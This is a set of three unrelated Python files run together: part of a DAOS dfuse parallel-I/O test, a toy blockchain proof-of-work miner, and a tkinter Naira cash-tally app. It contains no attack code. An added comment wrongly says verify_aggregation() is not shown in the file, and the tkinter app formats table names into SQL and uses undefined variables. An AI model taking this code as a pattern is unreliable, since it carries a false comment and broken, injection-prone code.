self.fail("Get free block size method failed with: {}".format(err))
return int(result)
def statvfs_pool(self, path):
"""Method to obtain free space using statvfs
Args:
path (str): path for which free space needs to be obtained for.
Returns:
List containing free space info for each pool supplied in pool_obj.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify if expected space is returned for each pool after containers
were destroyed. If not, wait for 60 secs and check again. Wait 4
times, otherwise exit the test with a failure.
        Args:
            reduced_space: amount of space expected to be reclaimed
            count (int): index of the pool being checked
        """
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,hw,daosio,medium,ib2,full_regression,parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.pool[0])
# create multiple containers
for _ in range(self.cont_count):
self.create_cont(self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = u"ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
ret_code.items() if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(self.dfuse.mount_dir.value + "/" + \
container_to_destroy, False)
self.fail("Fio was able to access destroyed container: {}".\
format(self.container[0].uuid))
except CommandFailure as error:
self.log.info("This run is expected to fail")
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until either the all space is returned back after aggregation
completion or exit the loop after trying for 240 secs of wait and
fail the test.
:avocado: tags=all,hw,daosio,medium,ib2,full_regression
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
            pool_thread = threading.Thread(target=self.create_pool)
pool_threads.append(pool_thread)
pool_thread.start()
        # wait for pool create to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse using --svc option only.
self.start_dfuse()
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container create process cannot
# be parallelised as different container create could complete at
# different times and get appended in the self.container variable in
# unorderly manner, causing problems during the write process.
for _, pool in enumerate(self.pool):
for _ in range(self.cont_count):
self.create_cont(pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
                cmd = u"ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
pfinal = 0
for count in range(self.cont_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
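    # verify_aggregation() is used above but not shown in this file.  A
    # minimal sketch of what the docstring describes (poll the pool's free
    # space until the reclaimed amount shows up, retrying every 60 secs for
    # up to 240 secs) could look like the method below.  It assumes
    # statvfs_pool() returns one free-space value per pool; the name
    # _verify_aggregation_sketch and the exact comparison are illustrative
    # only.
    def _verify_aggregation_sketch(self, reduced_space, count):
        """Hypothetical sketch: wait until aggregation returns the space."""
        import time
        expected = self.statvfs_before_cont_destroy[count] + reduced_space
        for _ in range(4):
            if self.statvfs_pool(self.dfuse.mount_dir.value)[count] >= expected:
                return
            time.sleep(60)
        self.fail("Aggregation did not return the expected space in 240 secs")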
|
miner.py
|
import time
import threading
from .. import blockchain
from ..wallet.address import Address
from ..util.hash import sha256d
REWARD = 5
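# Target threshold for proof-of-work: a block hash must be numerically below
# 2 ** (256 - 21), i.e. it needs roughly 21 leading zero bits, so a valid
# nonce takes about 2 ** 21 (~2 million) hash attempts on average.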
DIFFICULTY = 2 ** (256 - 21)
class Miner(object):
def __init__(self, address=None):
self.__interrupt = False
self.__found = False
self.__shutdown = False
        # keep the caller-supplied address, or generate a new one if omitted
        self.__address = address
        self.current_block = None
        if self.__address is None:
            self.__address = Address()
# print(self.__address.public_key)
# print(self.__address.private_key)
        self.main_thread = threading.Thread(target=self.main_loop)
def __debug(self, msg):
print(msg)
@property
def found(self):
return self.__found
def shutdown(self):
"""
"""
self.__shutdown = True
def interrupt(self):
"""
"""
self.__debug('------- INCOMING BLOCK --------')
self.__interrupt = True
def begin_mining(self):
"""
"""
self.__interrupt = False
def get_current_block(self):
if self.current_block:
return self.current_block.serialize()
return None
def create_current_block(self, transactions):
"""
"""
for tx in transactions:
if tx.is_coinbase:
transactions.remove(tx)
max_height = blockchain.BlockChain().get_height()
prev_block = blockchain.BlockChain().get_block_height(max_height)
fees = 0
for tx in transactions:
fees += tx.miner_fee
coin_base_output = {
'amount': REWARD + fees,
'public_key_owner': self.__address.public_key,
'unspent': 1,
}
coin_base_transaction_data = {
'hash': '',
'block_hash': '',
'num_inputs': 0,
'num_outputs': 1,
'timestamp': time.time(),
'is_coinbase': 1,
'is_orphan': 0,
'tx_inputs': [],
'tx_outputs': [coin_base_output],
}
coin_base_transaction = blockchain.transaction.Transaction(**coin_base_transaction_data)
transactions.append(coin_base_transaction)
block_data = {
'hash': '',
'timestamp': time.time(),
'nonce': '',
'num_transactions': len(transactions),
'is_orphan': 0,
'previous_block_hash': prev_block.hash,
'height': int(max_height) + 1,
'transactions': transactions,
}
new_block = blockchain.block.Block(**block_data)
self.current_block = new_block
return new_block
def start(self):
self.__debug('------ BEGIN MINING --------')
self.main_thread.start()
def main_loop(self):
"""
"""
while not self.__shutdown:
nonce = 0
while self.current_block is None:
pass
self.__debug('------- BEGIN MINING BLOCK --------')
block = self.current_block
            while not self.__interrupt and not self.__found:
block.nonce = nonce
block.hash = block.valid_hash()
if int(block.hash, 16) < DIFFICULTY:
self.__found = True
break
nonce += 1
if self.__found and not self.__interrupt:
self.__debug('------- BLOCK FOUND --------')
self.__interrupt = True
self.__debug('------- INTERRUPTED --------')
            # wait (without burning CPU) until the node clears the interrupt
            while self.__interrupt:
                time.sleep(0.05)
self.current_block = None
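# --- illustrative sketch -------------------------------------------------
# A minimal, standalone illustration of the proof-of-work check performed in
# Miner.main_loop(): double-SHA256 a header plus a nonce and accept the nonce
# once the digest, read as an integer, falls below the DIFFICULTY target.
# sha256d is re-implemented with hashlib here so the snippet is
# self-contained; the byte layout of the header is an assumption made only
# for this example.
import hashlib


def _sha256d_sketch(data):
    """Double SHA-256 (the usual meaning of sha256d)."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def _find_nonce_sketch(header_bytes, difficulty=DIFFICULTY):
    """Return the first nonce whose hash is below the difficulty target."""
    nonce = 0
    while True:
        digest = _sha256d_sketch(header_bytes + nonce.to_bytes(8, 'big'))
        if int.from_bytes(digest, 'big') < difficulty:
            return nonce
        nonce += 1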
|
F-box.py
|
from tkinter import *
from tkinter.tix import *
#import pyvips
from PIL import Image, ImageTk
from idlelib.tooltip import Hovertip
from tkinter import font
import ctypes
import win32con
from multiprocessing import Process,freeze_support,pool
from multiprocessing.dummy import Pool as ThreadPool
import threading
from time import sleep
from os import path
import sys
import os.path
#from win32api import GetSystemMetrics
import sqlite3
import pickle
from tkinter import ttk
from tkinter.messagebox import showerror
from tkinter.messagebox import showwarning
from tkinter.messagebox import askokcancel
from tkinter.messagebox import askyesno
from winsound import *
from tkinter.filedialog import askopenfilename
import tkinter as tk
from matplotlib.figure import Figure
from matplotlib import pyplot as plt
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg,NavigationToolbar2Tk)
from tkinter import colorchooser
ctypes.windll.shcore.SetProcessDpiAwareness(2)
root=Tk()
sys.setrecursionlimit(20000)
#f-analysis class frame
class Financial:
def __init__(self,main):
myframe=Frame()
self.myframe=myframe
self.photo=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Untitled-1FRE-Temp0001.pn.png")
self.photo=self.photo.resize((round(root.winfo_screenwidth()/2.4),round(root.winfo_screenheight()/5.4)))
self.show=ImageTk.PhotoImage(self.photo)
self.showit=Label(root,image=self.show,bd=0,borderwidth=0)
        #if the check-button (themes) file does not exist yet, create it automatically
if path.exists('check.pkl')==False:
data=0
with open('check.pkl', 'wb') as f1:
self.data=pickle.dump(data,f1)
f1.close()
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
        #if the template file does not exist yet, create it automatically
if path.exists('loader.pk')==False:
data2='Main'
with open('loader.pk', 'wb') as f2:
self.data3=pickle.dump(data2,f2)
f2.close()
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
        # if the check-button file exists and its size is greater than 0
if path.exists('check.pkl')==True and os.path.getsize('check.pkl')>0:
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
        # if the template file exists and its size is greater than 0
if path.exists('loader.pk')==True and os.path.getsize('loader.pk')>0:
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
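        #if the database does not exist yet, create it with a default 'data' table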
if path.exists('data.db')==False:
data=sqlite3.connect('data.db')
connet=data.cursor()
connet.execute("CREATE TABLE data(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)")
data.commit()
data.close()
if path.exists('data.db')==True:
if path.exists('loader.pk')==True and os.path.getsize('loader.pk')>0:
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
print(self.data3)
data=sqlite3.connect('data.db')
connet=data.cursor()
self.names=connet.execute("SELECT cells FROM {}".format(self.data3)).fetchall()
self.play=connet.execute('SELECT rowid FROM {}'.format(self.data3)).fetchall()
data.commit()
data.close()
# print(main.label.cget('text'))
self.top=Toplevel(root)
#self.top.geometry('{}x{}+0+0'.format(self.top.winfo_screenwidth(),self.top.winfo_screenheight()))
self.top.withdraw()
def get(self):
self.top.deiconify()
self.width=self.top.winfo_screenwidth()
self.height=self.top.winfo_screenheight()
root.withdraw()
#self.top=self.top
self.top.bind('<Alt-F4>',self.close)
self.v=IntVar()
self.v.set(round(0.00625*self.width))
self.top.geometry('{}x{}+0+1'.format(self.width,self.height))
#self.top.protocol('WM_DELETE_WINDOW',second.close)
self.top.bind('<Configure>',self.master_update)
my_menu=Menu(self.top,background='black',activebackground='black',foreground='white',bg='black',borderwidth=0,bd=0)
self.g='200x200+0+0'
#self.top.wm_attributes('-type','splash')
self.top.overrideredirect(True)
#self.top.state('zoomed')
photos1=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\bar.png")
photos1=ImageTk.PhotoImage(photos1)
photos2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\scatter.png")
photos2=ImageTk.PhotoImage(photos2)
photos3=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\basic.png")
photos3=ImageTk.PhotoImage(photos3)
photos4=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\rank.png")
photos4=ImageTk.PhotoImage(photos4)
photos5=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\max.png")
photos5=ImageTk.PhotoImage(photos5)
self.nam=['1']*50
self.j2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\suunday.png")
self.j2=ImageTk.PhotoImage(self.j2)
self.top.wm_title('Financial Analysis')
self.top.config(bg='white')
self.top.iconphoto(False,self.j2)
#Main canvas that contains the spreadsheet widgets
self.c = Canvas(self.top,borderwidth=0,width=self.width//1.1925465839,
height=self.height//1.2705882353,bg='#EBEBE6',highlightthickness=0)
        #canvas that contains the column names
self.c3=Canvas(self.top,bg='black',width=self.width//1.1925465839,
height=self.height//36,bd=0,borderwidth=0,highlightthickness=0)
#canvas that contains the cell row names label
self.c4=Canvas(self.top,bg='black',width=self.width//6.7605633803,
height=self.width//36,bd=0,borderwidth=0,highlightthickness=0)
        #canvas that contains menu bar 1
self.toolbar=Canvas(self.top,width=self.width//1.1925465839,
height=0.05*self.height,bg='white',bd=0,borderwidth=0,highlightthickness=0)
        #canvas that contains menu bar 2
self.toolbar2=Canvas(self.top,width=self.width//6.7605633803,
height=0.05*self.height,bg='white',bd=0,borderwidth=0,highlightthickness=0)
self.c41=self.c4.create_text(round(self.width/13.24),round(self.height/72),text='Cells Names',font=('Helvatica',self.v.get(),'bold'),fill='red')
        #container frame for the main canvas
self.f2=Frame(self.c,bg='#EBEBE6')
        #canvas that contains the cell row names
self.c2=Canvas(self.top,bg='#EBEBE6',width=self.width//6.7605633803,
height=self.height//1.2705882353,borderwidth=0,highlightthickness=0,bd=0)
self.top.bind('<Up>',self.up)
self.top.bind('<Down>',self.down)
self.top.bind('<Right>',self.right)
self.top.bind('<Left>',self.left)
        #frame that contains the cell row names
self.f3=Frame(self.c2,bg='#EBEBE6')
#canvas that contains the ent and bu widgets for auto-calculation
self.testf=Canvas(self.top,borderwidth=0,width=self.width//1.1925465839,
height=self.height//7.397260274,bg='white',highlightthickness=0)
#frame that contains the canvas that holds the ent and bu widgets
self.test9=Frame(self.testf)
        #canvas that holds the configure button and back button
self.testy=Canvas(self.top,borderwidth=0,width=round(self.width//6.7605633803),
height=round(self.height//7.397260274),bg='white',highlightthickness=0)
        #frame that contains the canvas which holds the configure and back buttons
self.test10=Frame(self.testy,bg='white')
print(root.winfo_screenwidth())
self.barframe=Canvas(self.top,bg='white',width=round(self.width//6.1935483871),
height=round(self.height//7.397260274),bd=-2,highlightthickness=0,borderwidth=0)
self.barframe2=Frame(self.barframe,bg='white')
#barframe3=Canvas(barframe2,bg='blue',width=310,height=0.05*self.top.winfo_screenheight())
self.sc1=Scrollbar(self.top,orient='vertical',command=self.scroll,bg='black')
self.sc=Scrollbar(self.test10,orient='horizontal',command=self.scroll1)
self.f4=Frame(self.c3,bg='#EBEBE6')
self.f6=Frame(self.toolbar2,bg='white')
self.f7=Frame(self.toolbar,bg='white')
menu1=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\print.png")
menu1=menu1.resize((int(self.width//42.666666667),int(self.height//27)))
menu1=ImageTk.PhotoImage(menu1)
menu2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\pdf.png")
menu2=menu2.resize((int(self.width//48),int(self.height//27)))
menu2=ImageTk.PhotoImage(menu2)
menu3=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Excel.png")
menu3=menu3.resize((int(self.width//38.4),int(self.height//25.11627907)))
menu3=ImageTk.PhotoImage(menu3)
self.one=Menubutton(self.f6,text='Create New Template',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=17,bd=-2,borderwidth=-2,highlightthickness=0)
self.two=Menubutton(self.f7,text='Menu',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,bd=-2,borderwidth=-2,highlightthickness=0)
self.three=Menubutton(self.f7,text='Edit',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=4,bd=-2,borderwidth=-2,highlightthickness=0)
self.four=Menubutton(self.f7,text='Graph',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=4,bd=-2,borderwidth=-2,highlightthickness=0)
self.five=Menubutton(self.f7,text='Functions',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=7,bd=-2,borderwidth=-2,highlightthickness=0)
self.six=Button(self.f7,image=menu1,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.six.menu1=menu1
self.seven=Button(self.f7,image=menu2,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.seven.menu2=menu2
hov2=Hovertip(self.seven,'Convert To PDF Format',hover_delay=500)
self.eight=Button(self.f7,image=menu3,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.eight.menu3=menu3
hov2=Hovertip(self.eight,'Convert To Excel Format',hover_delay=500)
self.template=Label(self.f7,text=self.data3)
self.top.bind('<ButtonPress-1>',self.tryer1)
self.ted=Menu(self.one,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0,bd=-2,borderwidth=0)
self.ted1=Menu(self.two,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted2=Menu(self.three,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted3=Menu(self.four,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted4=Menu(self.five,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0,bd=0)
self.one['menu']=self.ted
self.two['menu']=self.ted1
self.three['menu']=self.ted2
self.four['menu']=self.ted3
self.five['menu']=self.ted4
self.two.grid(row=0,column=0,sticky='w',padx=8)
self.one.grid(row=0,column=0,sticky='w',padx=8)
self.three.grid(row=0,column=1,sticky='w')
self.four.grid(row=0,column=2,sticky='w',padx=8)
self.five.grid(row=0,column=3,sticky='w',padx=8)
self.six.grid(row=0,column=4,sticky='w',padx=8)
hov1=Hovertip(self.six,'Print File',hover_delay=500)
self.seven.grid(row=0,column=5,sticky='w',padx=8)
self.eight.grid(row=0,column=6,sticky='w',padx=8)
self.template.grid(row=0,column=10,sticky='w',)
self.ted.add_command(label='Create',command=self.create)
self.ted.add_command(label='Load',command=self.load)
self.ted.add_command(label='Edit')
self.ted.add_command(label='Delete')
self.ted1.add_command(label='Open')
self.ted1.add_command(label='Open As')
self.ted1.add_command(label='Save')
self.ted1.add_command(label='Save As')
self.ted1.add_command(label='Print')
self.ted1.add_command(label='Open Recent')
self.ted1.add_command(label='Options')
self.ted1.add_command(label='Exit')
self.ted3.add_command(label='Basic Graph',image=photos3,compound='left',command=self.graph)
self.ted3.photos3=photos3
self.ted3.add_command(label='Scatter Graph',image=photos2,compound='left',command=self.graph2)
self.ted3.photos2=photos2
self.ted3.add_command(label='Bar Graph',image=photos1,compound='left',command=self.graph3)
self.ted3.photos1=photos1
self.ted4.add_command(label='Sum',command=self.sum)
self.ted4.add_command(label='Average',command=self.average)
self.ted4.add_command(label='Rank',image=photos4,compound='left',command=self.rank)
self.ted4.photos4=photos4
self.ted4.add_command(label='Min',command=self.min)
self.ted4.add_command(label='Max',image=photos5,compound='left',command=self.max)
self.ted4.photos5=photos5
        #these are the entries for the function answers
ent=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent.grid(row=0,column=1)
sep=ttk.Separator(self.test9,orient='vertical')
sep.grid(row=0,column=1,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent)
ent2=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent2.grid(row=0,column=2)
sep1=ttk.Separator(self.test9,orient='vertical')
sep1.grid(row=0,column=2,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent2)
ent3=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent3.grid(row=0,column=3)
sep2=ttk.Separator(self.test9,orient='vertical')
sep2.grid(row=0,column=3,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent3)
ent4=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent4.grid(row=0,column=4)
sep3=ttk.Separator(self.test9,orient='vertical')
sep3.grid(row=0,column=4,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent4)
ent5=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent5.grid(row=0,column=5)
sep4=ttk.Separator(self.test9,orient='vertical')
sep4.grid(row=0,column=5,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent5)
ent6=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent6.grid(row=0,column=6)
sep5=ttk.Separator(self.test9,orient='vertical')
sep5.grid(row=0,column=6,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent6)
ent7=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent7.grid(row=0,column=7)
sep6=ttk.Separator(self.test9,orient='vertical')
sep6.grid(row=0,column=7,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent7)
ent8=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent8.grid(row=0,column=8)
h11.append(ent8)
self.lf=round(0.0067708333*self.top.winfo_screenwidth()) #this is the font size variable for the p labels
self.ls=16 #this is the width size of the p label
        #this is the popup menu for the sum function
self.men=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men.add_cascade(label=' Choose',state='disabled')
self.men.add_separator()
self.men.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent,x=1000:self.cal(l,d,w,x))
self.men.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2,x=500:self.cal(l,d,w,x))
self.men.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3,x=200:self.cal(l,d,w,x))
self.men.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4,x=100:self.cal(l,d,w,x))
self.men.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5,x=50:self.cal(l,d,w,x))
self.men.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6,x=20:self.cal(l,d,w,x))
self.men.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7,x=10:self.cal(l,d,w,x))
self.men.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8,x=5:self.cal(l,d,w,x))
        #This is the popup menu for the average function
self.men2=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men2.add_cascade(label=' Choose',state='disabled')
self.men2.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent,x=1000:self.cal2(l,d,w,x))
self.men2.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2,x=500:self.cal2(l,d,w,x))
self.men2.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3,x=200:self.cal2(l,d,w,x))
self.men2.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4,x=100:self.cal2(l,d,w,x))
self.men2.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5,x=50:self.cal2(l,d,w,x))
self.men2.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6,x=20:self.cal2(l,d,w,x))
self.men2.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7,x=10:self.cal2(l,d,w,x))
self.men2.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8,x=5:self.cal2(l,d,w,x))
#This is the popupmenu for rank function
self.men3=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men3.add_cascade(label=' Choose',state='disabled')
self.men3.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal3(l,d,x))
self.men3.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal3(l,d,x))
self.men3.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal3(l,d,x))
self.men3.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal3(l,d,x))
self.men3.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal3(l,d,x))
self.men3.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal3(l,d,x))
self.men3.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal3(l,d,x))
self.men3.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal3(l,d,x))
#This is the popup menu for min function
self.men4=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men4.add_cascade(label=' Choose',state='disabled')
self.men4.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent:self.cal4(l,d,w))
self.men4.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2:self.cal4(l,d,w))
self.men4.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3:self.cal4(l,d,w))
self.men4.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4:self.cal4(l,d,w))
self.men4.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5:self.cal4(l,d,w))
self.men4.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6:self.cal4(l,d,w))
self.men4.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7:self.cal4(l,d,w))
self.men4.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8:self.cal4(l,d,w))
        #This is the popup menu for the max function
self.men5=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men5.add_cascade(label=' Choose',state='disabled')
self.men5.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent:self.cal5(l,d,w))
self.men5.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2:self.cal5(l,d,w))
self.men5.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3:self.cal5(l,d,w))
self.men5.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4:self.cal5(l,d,w))
